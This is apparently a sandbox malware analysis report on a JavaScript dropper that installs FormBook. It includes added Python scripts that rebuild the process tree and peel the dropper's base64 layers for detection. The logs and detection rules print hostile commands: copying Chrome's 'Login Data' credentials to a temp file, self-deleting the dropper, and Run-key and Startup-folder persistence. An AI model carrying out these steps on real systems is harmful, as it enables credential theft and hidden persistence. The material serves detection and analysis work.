Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA320 NtCreateFile, 2_2_000CA320
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA3D0 NtReadFile, 2_2_000CA3D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA450 NtClose, 2_2_000CA450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA500 NtAllocateVirtualMemory, 2_2_000CA500
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA31A NtCreateFile, 2_2_000CA31A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA3CA NtReadFile, 2_2_000CA3CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA4FA NtAllocateVirtualMemory, 2_2_000CA4FA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018399A0 NtCreateSection,LdrInitializeThunk, 2_2_018399A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01839910
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_018398F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839840 NtDelayExecution,LdrInitializeThunk, 2_2_01839840
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01839860
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01839A00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A20 NtResumeThread,LdrInitializeThunk, 2_2_01839A20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A50 NtCreateFile,LdrInitializeThunk, 2_2_01839A50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018395D0 NtClose,LdrInitializeThunk, 2_2_018395D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839540 NtReadFile,LdrInitializeThunk, 2_2_01839540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01839780
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_018397A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01839FE0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01839710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_018396E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01839660
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018399D0 NtCreateProcessEx, 2_2_018399D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839950 NtQueueApcThread, 2_2_01839950
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018398A0 NtWriteVirtualMemory, 2_2_018398A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839820 NtEnumerateKey, 2_2_01839820
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0183B040 NtSuspendThread, 2_2_0183B040
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0183A3B0 NtGetContextThread, 2_2_0183A3B0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839B00 NtSetValueKey, 2_2_01839B00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A80 NtOpenDirectoryObject, 2_2_01839A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_04F39860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39840 NtDelayExecution,LdrInitializeThunk, 18_2_04F39840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F395D0 NtClose,LdrInitializeThunk, 18_2_04F395D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F399A0 NtCreateSection,LdrInitializeThunk, 18_2_04F399A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39540 NtReadFile,LdrInitializeThunk, 18_2_04F39540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_04F39910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F396E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_04F396E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F396D0 NtCreateKey,LdrInitializeThunk, 18_2_04F396D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_04F39660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A50 NtCreateFile,LdrInitializeThunk, 18_2_04F39A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39650 NtQueryValueKey,LdrInitializeThunk, 18_2_04F39650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39610 NtEnumerateValueKey,LdrInitializeThunk, 18_2_04F39610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39FE0 NtCreateMutant,LdrInitializeThunk, 18_2_04F39FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39780 NtMapViewOfSection,LdrInitializeThunk, 18_2_04F39780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39710 NtQueryInformationToken,LdrInitializeThunk, 18_2_04F39710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39B00 NtSetValueKey,LdrInitializeThunk, 18_2_04F39B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F398F0 NtReadVirtualMemory, 18_2_04F398F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F398A0 NtWriteVirtualMemory, 18_2_04F398A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3B040 NtSuspendThread, 18_2_04F3B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39820 NtEnumerateKey, 18_2_04F39820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F395F0 NtQueryInformationFile, 18_2_04F395F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F399D0 NtCreateProcessEx, 18_2_04F399D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39560 NtWriteFile, 18_2_04F39560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39950 NtQueueApcThread, 18_2_04F39950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3AD30 NtSetContextThread, 18_2_04F3AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39520 NtWaitForSingleObject, 18_2_04F39520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A80 NtOpenDirectoryObject, 18_2_04F39A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39670 NtQueryInformationProcess, 18_2_04F39670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A20 NtResumeThread, 18_2_04F39A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A10 NtQuerySection, 18_2_04F39A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A00 NtProtectVirtualMemory, 18_2_04F39A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3A3B0 NtGetContextThread, 18_2_04F3A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F397A0 NtUnmapViewOfSection, 18_2_04F397A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39770 NtSetInformationFile, 18_2_04F39770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3A770 NtOpenThread, 18_2_04F3A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39760 NtOpenProcess, 18_2_04F39760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39730 NtQueryVirtualMemory, 18_2_04F39730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3A710 NtOpenProcessToken, 18_2_04F3A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA320 NtCreateFile, 18_2_032FA320
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA3D0 NtReadFile, 18_2_032FA3D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA500 NtAllocateVirtualMemory, 18_2_032FA500
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA450 NtClose, 18_2_032FA450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA31A NtCreateFile, 18_2_032FA31A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA3CA NtReadFile, 18_2_032FA3CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA4FA NtAllocateVirtualMemory, 18_2_032FA4FA
Source: 5hol_r7nkdhp.exe.4.dr Static PE information: No import functions for PE file found
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: CIQ-PO162667.js Initial sample: Strings found which are bigger than 50
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\bin.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5hol_r7nkdhp.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5hol_r7nkdhp.exe.4.dr Static PE information: Section .text
Source: bin.exe.0.dr Static PE information: Section .text
Source: CIQ-PO162667.js Virustotal: Detection: 25%
Source: CIQ-PO162667.js ReversingLabs: Detection: 21%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO162667.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
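The process-creation records above are the infection chain end to end: the user-launched wscript.exe re-launches the dropped VjW0rm script in batch mode (//B suppresses script error dialogs) and runs bin.exe out of %TEMP%; bin.exe never appears as a parent again because the FormBook payload injects into the already running explorer.exe (the cmmon32.pdb string recovered from bin.exe memory further down in this section is consistent with cmmon32.exe being the chosen host), and it is explorer.exe that launches cmmon32.exe, which then drives cmd.exe to delete the dropper and copy Chrome's Login Data database. The script below is an added example and not part of the sandbox report: it parses the 'Process created' lines exactly as printed above (repeats dropped), rebuilds the parent/child tree and applies a few rules that fire on this chain. The rule names and conditions are this example's own choices.

```python
import re
from collections import defaultdict

# The distinct 'Process created' lines of this report, verbatim (repeated launches dropped).
REPORT_LINES = [
    r'Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO162667.js"',
    r'Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js',
    r'Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"',
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"',
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js"',
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe',
    r'Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V',
    r'Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe',
]

# The image path is matched non-greedily up to the first '.exe' so that paths containing
# spaces ("Program Files (x86)") survive; whatever follows is the command line.
LINE_RE = re.compile(r'^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe)\s*(?P<cmdline>.*)$', re.I)


def parse(lines):
    """Turn report lines into dicts with parent / image / cmdline keys."""
    return [m.groupdict() for m in map(LINE_RE.match, lines) if m]


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


# (tag, predicate) pairs. Names and thresholds are this example's own.
RULES = [
    ('wscript_batch_mode',
     lambda e: basename(e['image']) == 'wscript.exe' and '//b' in e['cmdline'].lower()),
    ('script_host_runs_pe_from_appdata',
     lambda e: basename(e['parent']) == 'wscript.exe' and '\\appdata\\' in e['image'].lower()),
    ('startup_folder_script_executed',
     lambda e: basename(e['image']) == 'wscript.exe'
     and '\\start menu\\programs\\startup\\' in e['cmdline'].lower()),
    # explorer.exe starting a SysWOW64 binary with a bare image path and no arguments is how
    # the hollowed host shows up in this report.
    ('explorer_spawns_bare_syswow64_binary',
     lambda e: basename(e['parent']) == 'explorer.exe' and '\\syswow64\\' in e['image'].lower()
     and e['cmdline'].strip().lower() == e['image'].lower()),
    ('self_delete_via_cmd',
     lambda e: basename(e['image']) == 'cmd.exe'
     and re.search(r'/c\s+del\s', e['cmdline'], re.I) is not None
     and '\\temp\\' in e['cmdline'].lower()),
    ('browser_credential_db_copied',
     lambda e: basename(e['image']) == 'cmd.exe' and 'login data' in e['cmdline'].lower()),
]


def find_suspicious(events):
    """Every (tag, event) pair for which a rule holds."""
    return [(tag, e) for e in events for tag, pred in RULES if pred(e)]


def render_tree(events):
    """Indented parent -> child listing keyed by image path. Roots are parents that never
    appear as a child; the 'seen' set stops the wscript.exe -> wscript.exe self-edge from
    recursing forever."""
    children = defaultdict(list)
    for e in events:
        children[e['parent'].lower()].append(e)
    child_paths = {e['image'].lower() for e in events}
    roots = [p for p in children if p not in child_paths]
    out, seen = [], set()

    def walk(path, depth):
        for e in children.get(path, []):
            out.append('  ' * depth + f"{basename(e['image'])}  {e['cmdline']}")
            key = e['image'].lower()
            if key not in seen:
                seen.add(key)
                walk(key, depth + 1)

    for root in roots:
        out.append(root)
        walk(root, 1)
    return '\n'.join(out)


if __name__ == '__main__':
    evs = parse(REPORT_LINES)
    print(render_tree(evs))
    for tag, e in find_suspicious(evs):
        print(f'[{tag}] {basename(e["parent"])} -> {basename(e["image"])} {e["cmdline"]}')
```

render_tree prints explorer.exe as a second root because nothing in the list spawned it, which is itself the injection clue. In EDR telemetry join on a process GUID rather than the image path; that is what keeps the wscript.exe -> wscript.exe self-edge unambiguous.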
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@19/5@41/14
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4744:120:WilError_01
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities
Source: Binary string: cmmon32.pdb source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.287029709.000000000163B000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.283814480.000000000149D000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441378335.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441685215.00000000018EF000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.441045489.0000000004D33000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808288523.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.439635853.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808473944.0000000004FEF000.00000040.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.781887430.0000000001100000.00000004.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.783460088.0000000001290000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.287029709.000000000163B000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.283814480.000000000149D000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441378335.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441685215.00000000018EF000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000012.00000003.441045489.0000000004D33000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808288523.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.439635853.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808473944.0000000004FEF000.00000040.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.781887430.0000000001100000.00000004.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.783460088.0000000001290000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000BC928 push cs; retf 2_2_000BC935
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B492D push eax; ret 2_2_000B492E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000C72B3 push eax; retf 2_2_000C72B4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CEB3B push dword ptr [7D52CE57h]; ret 2_2_000CEB5E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD625 push eax; ret 2_2_000CD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD67B push eax; ret 2_2_000CD6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD672 push eax; ret 2_2_000CD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD6DC push eax; ret 2_2_000CD6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0184D0D1 push ecx; ret 2_2_0184D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F4D0D1 push ecx; ret 18_2_04F4D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FEB3B push dword ptr [7D52CE57h]; ret 18_2_032FEB5E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F72B3 push eax; retf 18_2_032F72B4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E492D push eax; ret 18_2_032E492E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032EC928 push cs; retf 18_2_032EC935
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD625 push eax; ret 18_2_032FD678
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD67B push eax; ret 18_2_032FD6E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD672 push eax; ret 18_2_032FD678
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD6DC push eax; ret 18_2_032FD6E2
Source: CIQ-PO162667.js String : entropy: 5.56, length: 338084, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRIbHdaVzltSUNnaFFYSnlZWGt1Y0hKdmRHOTBlWEJsTG1admNrVmhZMmdnUHlCQmNuSmh
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe
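The 338084-character string flagged above is worth a second look. The report gives its entropy as 5.56 (on the bits-per-character scale that sits just under the 6.0 ceiling of the base64 alphabet) and prints its first characters, and those characters decode to `try{ var longText1 = "dHlw...`, whose quoted literal is base64 again. The script below is an added example, not part of the report, that peels such nested layers. It uses only the prefix quoted in the report, so decoding stops at the truncation point and the full script is not reproduced here; the helper names are this example's own.

```python
import base64
import math
import re
from collections import Counter

# Prefix of the 338084-character literal quoted in the report above; the report truncates it
# and so does this example.
REPORT_PREFIX = 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRIbHdaVzltSUNnaFFYSnlZWGt1Y0hKdmRHOTBlWEJsTG1admNrVmhZMmdnUHlCQmNuSmh'

B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def shannon_entropy(s):
    """Bits per character. Base64 text cannot exceed 6.0; plain JavaScript sits well below."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def decode_complete_quanta(s):
    """Decode only whole 4-character groups, so a truncated tail cannot raise a padding error."""
    s = s.rstrip('=')
    return base64.b64decode(s[:len(s) - len(s) % 4])


def first_literal(text, min_len=16):
    """First quoted run of base64 characters in decoded script text ('' if there is none)."""
    m = re.search(r'["\']([A-Za-z0-9+/=]{%d,})' % min_len, text)
    return m.group(1) if m else ''


def peel(blob, max_layers=8):
    """Decode, pull out the embedded literal, repeat until the data stops looking like base64.
    Returns the decoded text of every layer, outermost first."""
    layers, cur = [], blob
    for _ in range(max_layers):
        if not B64_RE.match(cur):
            break
        layers.append(decode_complete_quanta(cur).decode('latin-1'))
        cur = first_literal(layers[-1])
        if not cur:
            break
    return layers


if __name__ == '__main__':
    print(f'entropy of prefix: {shannon_entropy(REPORT_PREFIX):.2f} bits/char')
    for depth, text in enumerate(peel(REPORT_PREFIX), 1):
        print(f'--- layer {depth} ({len(text)} chars) ---')
        print(text)
```

On the prefix it recovers two layers and the opening of the second-stage code (`typeof (!Array.prototype.forEach ? A`, the start of a forEach polyfill). On the full literal the same loop keeps going until the decoded text stops looking like base64, which is the point at which the result belongs in a JavaScript deobfuscator rather than a base64 decoder.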

Boot Survival

Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\SysWOW64\cmmon32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run T2KDJXN
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
